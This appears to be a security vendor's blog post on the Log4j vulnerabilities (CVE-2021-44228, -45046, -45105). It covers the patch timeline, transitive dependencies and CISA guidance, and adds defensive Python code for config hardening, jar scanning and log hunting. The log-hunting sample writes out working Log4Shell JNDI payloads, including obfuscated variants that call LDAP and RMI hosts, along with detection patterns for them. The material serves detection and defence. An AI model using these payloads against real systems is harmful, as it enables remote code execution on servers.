Cybersecurity experts are playing whack-a-mole with the Log4j bug
Since the Apache Log4j bug was disclosed, things have not gone well for cybersecurity teams: two further vulnerabilities in the library have been found since the first patch was released.
Last week, CISA issued an emergency directive (ED 22-02) requiring all federal civilian departments and agencies to identify assets running Apache Log4j and to patch or mitigate the vulnerabilities immediately.
Here is what Apache has released so far:
- December 10: Log4j 2.15.0 for Java 8, addressing the remote code execution (RCE) vulnerability CVE-2021-44228.
- December 13: Log4j 2.16.0 for Java 8 and Log4j 2.12.2 for Java 7, addressing CVE-2021-45046, an incomplete-fix issue that can also lead to RCE in certain non-default configurations.
- December 17: Log4j 2.17.0 for Java 8, addressing the denial-of-service (DoS) vulnerability CVE-2021-45105.
Apache's advisory states that Log4j versions 2.0-alpha1 through 2.16.0 did not protect against uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default PatternLayout containing a Context Lookup (for example $${ctx:loginId}), an attacker who controls Thread Context Map (MDC) data can supply a value containing a recursive lookup, which ends in a StackOverflowError that terminates the process. This is CVE-2021-45105, rated high severity with a CVSS score of 7.5; a patched 2.16.0 installation is still exposed to it.
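The recursion described above is only reachable when a PatternLayout pulls MDC data in through a Context Lookup, which the lookup interpolator expands on every event. The following is an added example, not code from the page or from Apache: it rewrites a log4j2.xml configuration so that every `${ctx:key}` or `$${ctx:key}` lookup becomes the Thread Context Map conversion pattern `%X{key}`, which emits the MDC value verbatim without any lookup expansion. The sample configuration is constructed for this example; note that `%X{key}` has no default-value syntax, so a `${ctx:key:-default}` lookup loses its default on conversion.

```python
# Added example, not code from the page or from Apache: convert Context Lookups in
# Log4j 2 PatternLayout patterns into %X{key} Thread Context Map patterns, which the
# lookup interpolator never expands. VULNERABLE_CONFIG is constructed for this example.
import re
import xml.etree.ElementTree as ET

# ${ctx:key} and the deferred form $${ctx:key}; an optional ":-default" suffix is
# captured separately because %X{key} has no default-value syntax and drops it.
CTX_LOOKUP = re.compile(r"\$\$?\{ctx:([^}:]+)(:-[^}]*)?\}")


def find_context_lookups(pattern):
    """Return the raw Context Lookup tokens present in a layout pattern."""
    return [m.group(0) for m in CTX_LOOKUP.finditer(pattern)]


def harden_pattern(pattern):
    """Replace every Context Lookup with the equivalent %X{key} conversion."""
    return CTX_LOOKUP.sub(lambda m: "%X{" + m.group(1) + "}", pattern)


def harden_config(xml_text):
    """Rewrite every PatternLayout in a log4j2.xml document, covering both the
    pattern="..." attribute form and the nested <Pattern> element form.
    Returns (rewritten_xml, [(old_pattern, new_pattern), ...])."""
    root = ET.fromstring(xml_text)
    changes = []
    for layout in root.iter("PatternLayout"):
        old = layout.get("pattern")
        if old is not None:
            new = harden_pattern(old)
            if new != old:
                layout.set("pattern", new)
                changes.append((old, new))
        for pat in layout.findall("Pattern"):
            old = pat.text or ""
            new = harden_pattern(old)
            if new != old:
                pat.text = new
                changes.append((old, new))
    return ET.tostring(root, encoding="unicode"), changes


# Constructed sample: one appender uses the attribute form with the deferred
# $${ctx:...} lookup, the other uses the element form with a default value.
VULNERABLE_CONFIG = """<Configuration status="WARN">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{HH:mm:ss} [%t] user=$${ctx:loginId} %-5level %c - %m%n"/>
    </Console>
    <File name="Audit" fileName="audit.log">
      <PatternLayout>
        <Pattern>%d req=${ctx:requestId:-none} %m%n</Pattern>
      </PatternLayout>
    </File>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/><AppenderRef ref="Audit"/></Root>
  </Loggers>
</Configuration>
"""

if __name__ == "__main__":
    hardened, changes = harden_config(VULNERABLE_CONFIG)
    for old, new in changes:
        print(f"- {old}\n+ {new}")
    print(hardened)
```

This is the configuration-level mitigation Apache lists for installations that cannot upgrade yet; it does not replace upgrading to 2.17.0, and any Context Lookup whose value comes from outside the application (HTTP headers, user input) should be removed rather than kept in any form.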
What many practitioners have discovered is that this vulnerability sits well below the surface, so a single patch step will not fix it. Google's Open Source Insights team members James Wetter and Nicky Ringland found that most affected Java packages do not depend on Log4j directly but pull it in transitively, and that for the majority of them the vulnerable dependency sits at least five levels deep in the dependency tree, some as deep as nine. Each intermediate package must publish a fixed release before the one above it can pick it up, so the deeper the dependency, the more steps (and maintainers) a fix requires.
Apache's fix is to upgrade to 2.17.0. Where that is not yet possible, Apache's listed mitigation is to edit the logging configuration: in PatternLayout, replace Context Lookups such as ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC), and remove Context Lookups whose values originate from sources external to the application, such as HTTP headers or user input. CISA also recommends applying the patch and doing the following:
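Because Log4j usually arrives transitively, the copy that matters is rarely declared anywhere an inventory would show it: it is bundled inside a WAR, an EAR, or a shaded fat jar. The following is an added example, not code from the page, Apache or Google: it walks a deployment, opens every archive in memory, recurses into archives nested inside other archives, reads the log4j-core version from the jar's Maven metadata, and reports which of the three CVEs above that copy is still exposed to. It assumes the version can be read from `META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties`, encodes only the fixed versions listed on this page (later branch backports would need adding to the table), and builds its own stub jars as constructed test artifacts.

```python
# Added example (not code from the page, Apache or Google): find every log4j-core
# copy under a directory, including copies nested inside war/ear/fat jars, and
# classify each one against the CVEs in the timeline above. Assumptions: the
# version is read from Maven's pom.properties inside the jar, and FIXED_IN only
# encodes the releases listed on this page.
import io
import os
import re
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
MAX_NESTING = 4  # fat jar -> war -> jar is common; deeper nesting is rare

# First fixed version per CVE; a (major, minor) key overrides the mainline
# boundary for a branch that received a backport (2.12.2 for Java 7).
FIXED_IN = {
    "CVE-2021-44228": {"mainline": (2, 15, 0), (2, 12): (2, 12, 2)},
    "CVE-2021-45046": {"mainline": (2, 16, 0), (2, 12): (2, 12, 2)},
    "CVE-2021-45105": {"mainline": (2, 17, 0)},
}


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.15' -> (2, 15, 0); None if unparseable."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def affected_cves(version):
    """CVEs that a log4j-core version is still exposed to, according to FIXED_IN."""
    v = parse_version(version)
    if v is None:
        return ["unparseable version"]
    if v[0] != 2:
        return []  # the advisories above cover the 2.x line only
    return [cve for cve, fixes in FIXED_IN.items()
            if v < fixes.get(v[:2], fixes["mainline"])]


def _read_version(zf):
    props = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    m = re.search(r"^version=(.+)$", props, re.MULTILINE)
    return m.group(1).strip() if m else "unknown"


def scan_archive(data, path, findings=None, depth=0):
    """Scan one archive held in memory; nested archives are expanded in memory
    too, so WEB-INF/lib and shaded jars are covered without unpacking to disk."""
    if findings is None:
        findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    if POM_PROPERTIES in names:
        version = _read_version(zf)
        cves = affected_cves(version)
        jndi_present = JNDI_LOOKUP_CLASS in names
        if not jndi_present:
            # JndiLookup.class deleted from the jar (a common interim fix): that
            # blocks the JNDI-based CVEs but not the recursion DoS, which lives
            # in the lookup interpolator, so CVE-2021-45105 stays flagged.
            cves = [c for c in cves if c == "CVE-2021-45105"]
        findings.append({"path": path, "version": version,
                         "jndi_lookup_present": jndi_present, "cves": cves})
    if depth < MAX_NESTING:
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                scan_archive(zf.read(name), f"{path}!{name}", findings, depth + 1)
    return findings


def scan_tree(root):
    """Scan every archive under a directory (e.g. an application server root)."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    scan_archive(fh.read(), full, findings)
    return findings


def build_fixture(version, remove_jndi=False, wrap_in_war=False):
    """Constructed test artifact: a stub log4j-core jar carrying only the Maven
    metadata and a placeholder JndiLookup.class, optionally nested inside a WAR."""
    jar = io.BytesIO()
    with zipfile.ZipFile(jar, "w") as zf:
        zf.writestr(POM_PROPERTIES, "groupId=org.apache.logging.log4j\n"
                    f"artifactId=log4j-core\nversion={version}\n")
        if not remove_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    if not wrap_in_war:
        return jar.getvalue()
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", jar.getvalue())
    return war.getvalue()


if __name__ == "__main__":
    for finding in scan_archive(build_fixture("2.14.1", wrap_in_war=True), "app.war"):
        print(finding)
```

Run `scan_tree("/opt/tomcat")` (or whatever root the server uses) on each host and feed the findings into the asset list; the `path` field uses `!` to show where inside an outer archive the copy sits, which is the information a dependency-depth problem leaves out of package manifests.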
- Discover all internet-facing assets that accept data input and use the Log4j Java library anywhere in the stack.
- Discover all assets that use the Log4j library.
- Update or isolate affected assets. Assume compromise, identify common post-exploit sources and activity, and hunt for signs of malicious activity.
- Monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).
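The "assume compromise" and "hunt for signs of malicious activity" steps start with the logs the vulnerable application already has. The following is an added example, not code from the page or from CISA: it scans web-access log lines for Log4Shell probes, URL-decodes them, and de-obfuscates the nested-lookup tricks attackers use to hide the `jndi` keyword (`${${lower:j}ndi:...}`, `${${::-j}${::-n}di:...}`) before matching. The log lines are constructed for this example, and the normaliser assumes the `lower`/`upper` lookups and the `:-default` trick, which cover the common in-the-wild variants; it is not a complete Log4j interpolator, so treat it as a triage aid rather than a blocking filter.

```python
# Added example, not code from the page or from CISA: hunt access-log lines for
# Log4Shell probes, including obfuscated forms that hide "jndi" behind nested
# lookups. SAMPLE_LOG is constructed for this example. The normaliser handles the
# lower/upper lookups and the ":-default" trick; it is not a full interpolator.
import re
from urllib.parse import unquote

INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")  # a ${...} with nothing nested inside
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:([^}]*)\}", re.I)
UNRESOLVED_OPEN, UNRESOLVED_CLOSE = "\x00{", "}\x00"


def _resolve_inner(body):
    """Evaluate one innermost lookup the way the obfuscations rely on:
    '<anything>:-<default>' yields the default (so ${::-j} -> j), and
    lower:/upper: transform their argument. Anything else is left as written,
    wrapped in a marker so the loop does not re-match it forever."""
    if ":-" in body:
        return body.split(":-", 1)[1]
    key, _, arg = body.partition(":")
    if key.lower() == "lower":
        return arg.lower()
    if key.lower() == "upper":
        return arg.upper()
    return UNRESOLVED_OPEN + body + UNRESOLVED_CLOSE


def normalize(text, max_rounds=50):
    """Collapse nested lookups inside-out until nothing changes, then put the
    untouched lookups back so the result reads like the de-obfuscated payload."""
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(lambda m: _resolve_inner(m.group(1)), text)
        if new == text:
            break
        text = new
    return text.replace(UNRESOLVED_OPEN, "${").replace(UNRESOLVED_CLOSE, "}")


def find_probes(text):
    """Return (scheme, full lookup) for every JNDI lookup found after
    URL-decoding and de-obfuscating the text."""
    norm = normalize(unquote(text))
    return [(m.group(1).lower(), m.group(0)) for m in JNDI_LOOKUP.finditer(norm)]


def hunt(lines):
    """Scan access-log lines (client IP is the first token, as in the Apache and
    Nginx combined formats) and return one alert per JNDI lookup found."""
    alerts = []
    for line in lines:
        client = line.split(" ", 1)[0]
        for scheme, lookup in find_probes(line):
            alerts.append({"client": client, "scheme": scheme, "lookup": lookup})
    return alerts


# Constructed sample: three probes (plain in the User-Agent, lower:-obfuscated in
# the query string, default-value obfuscated with an RMI target) and two benign
# lines that must not alert (a URL-encoded brace path and a harmless lookup).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET /login HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.7 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=${${lower:j}ndi:${lower:l}daps://203.0.113.9/o} '
    'HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.4 - - [10/Dec/2021:14:03:40 +0000] "POST /api HTTP/1.1" 200 88 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.4:1099/Exploit}"',
    '192.0.2.10 - - [10/Dec/2021:14:05:01 +0000] "GET /docs/%7Bjndi%7D HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [10/Dec/2021:14:06:00 +0000] "GET / HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (${date:yyyy})"',
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_LOG):
        print(f"{alert['client']} -> {alert['scheme']}: {alert['lookup']}")
```

The host and port inside each decoded lookup are the callback servers to pivot on: an alert here is a probe, and the corresponding outbound LDAP, LDAPS or RMI connection from the application host to that address (the traffic pattern in the last bullet above) is the sign that the probe landed.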
To learn more about the Log4j vulnerability, visit Cynet; for information about our plans to protect you from further vulnerabilities, contact our Vancouver or Austin office.